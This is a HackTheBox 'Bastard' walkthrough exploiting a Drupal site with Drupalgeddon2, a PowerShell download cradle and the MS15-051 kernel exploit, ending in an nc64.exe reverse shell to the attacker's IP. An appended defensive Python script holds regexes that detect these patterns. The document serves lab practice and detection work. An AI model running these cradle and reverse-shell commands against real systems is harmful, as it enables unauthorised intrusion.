echo "10.129.149.237 bastard.htb" | sudo tee -a /etc/hosts

nmap -A -p- -oA output 10.129.149.237 --min-rate=10000 --script=vuln --script-timeout=15 -v

Pasted image 20210511094802.png

nmap -sC -sV -O -p- -oA bastard 10.129.149.237

nmap -sU -O -p- -oA bastard-udp 10.129.149.237

nikto -h 10.129.149.237:80

gobuster dir -k -u http://bastard.htb/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 100

Pasted image 20210511095149.png

We can see it is a Drupal site.


curl http://bastard.htb/CHANGELOG.txt

Pasted image 20210511095304.png

We download script 41564.

Pasted image 20210511095532.png

We change the variables in the code.

Pasted image 20210511095849.png

php 41564.php

Pasted image 20210511100006.png

We can see the created password.

Pasted image 20210511100225.png

Pasted image 20210511100924.png

This did not work for me.

So I decided to use Drupalgeddon2.


git clone https://github.com/dreadlocked/Drupalgeddon2

I also had to install highline.

sudo gem install highline


ruby drupalgeddon2.rb http://bastard.htb

Pasted image 20210511102101.png

Pasted image 20210511102127.png

The certutil command did not work for me.

So I decided to use InvokePowershell.ps1.

Pasted image 20210511105840.png

python3 -m http.server 8888

drupalgeddon2>> powershell iex(new-object net.webclient).downloadstring('http://10.10.14.64:8888/InvokePowershell.ps1')

Pasted image 20210511105744.png

https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS15-051

Make sure nc64.exe and ms15-051x64.exe are in the directory where you run the following command:

python3 /opt/impacket/examples/smbserver.py smbFolder $(pwd)

drupalgeddon2>> \\10.10.14.135\smbFolder\ms15-051x64.exe "\\10.10.14.135\smbFolder\nc64.exe -e cmd.exe 10.10.14.135 443"
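From the defender's side, the last two steps leave distinctive traces in process-creation telemetry (Sysmon Event ID 1 or Windows Security 4688): a PowerShell download cradle built from `iex` and `net.webclient`, and an executable launched straight from a remote UNC share. As an added example that is not part of the original notes, the Python below scans constructed command lines for those patterns; the IP 198.51.100.7, the paths and the rule names and regexes are mine and not taken from any product.

```python
import re
from typing import Dict, List

# Constructed process command lines in the shape a Sysmon Event ID 1 / Security
# 4688 collector would hand you. None are captured from the box; 198.51.100.7 is
# a documentation address.
SAMPLE_COMMAND_LINES = [
    r"powershell iex(new-object net.webclient).downloadstring('http://198.51.100.7:8888/x.ps1')",
    r'\\198.51.100.7\share\tool.exe "\\198.51.100.7\share\nc64.exe -e cmd.exe 198.51.100.7 443"',
    r"C:\Windows\System32\notepad.exe C:\Users\bob\notes.txt",
    r"powershell -NoProfile -File C:\scripts\backup.ps1",
]

# Each rule is a regex over the whole command line. The lookahead form lets the
# cradle rule match its two parts in any order.
RULES = {
    # Invoke-Expression combined with a WebClient download in one command line.
    "powershell_download_cradle": re.compile(
        r"(?=.*\b(iex|invoke-expression)\b)"
        r"(?=.*(downloadstring|downloadfile|net\.webclient))",
        re.IGNORECASE,
    ),
    # An .exe referenced by a \\host\share\... path (executed, or passed as an argument).
    "exec_from_unc_path": re.compile(
        r"(^|[\s\"'])\\\\[\w.-]+\\[^\s\"']+\.exe\b", re.IGNORECASE
    ),
    # nc / nc64 invoked with "-e cmd.exe", the classic bind-cmd-to-socket shape.
    "netcat_style_shell": re.compile(
        r"\bnc(64)?(\.exe)?\s+.*-e\s+cmd(\.exe)?\b", re.IGNORECASE
    ),
}


def classify(cmdline: str) -> List[str]:
    """Return the names of every rule that fires on one command line."""
    return [name for name, regex in RULES.items() if regex.search(cmdline)]


def scan(lines: List[str]) -> Dict[int, List[str]]:
    """Map line index -> matched rule names, keeping only lines that fired."""
    hits: Dict[int, List[str]] = {}
    for index, line in enumerate(lines):
        matched = classify(line)
        if matched:
            hits[index] = matched
    return hits


if __name__ == "__main__":
    for index, names in scan(SAMPLE_COMMAND_LINES).items():
        print(f"[{', '.join(names)}] {SAMPLE_COMMAND_LINES[index]}")
```

The two benign lines (a local Notepad launch and a scheduled script run from a local path) do not fire any rule, which is the property to keep while tuning: the UNC rule in particular needs an allow-list for legitimate software shares before it goes into production.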

![[Pasted image 20211223080756.png]]


copyright©2022 Cu3rv0x all rights reserved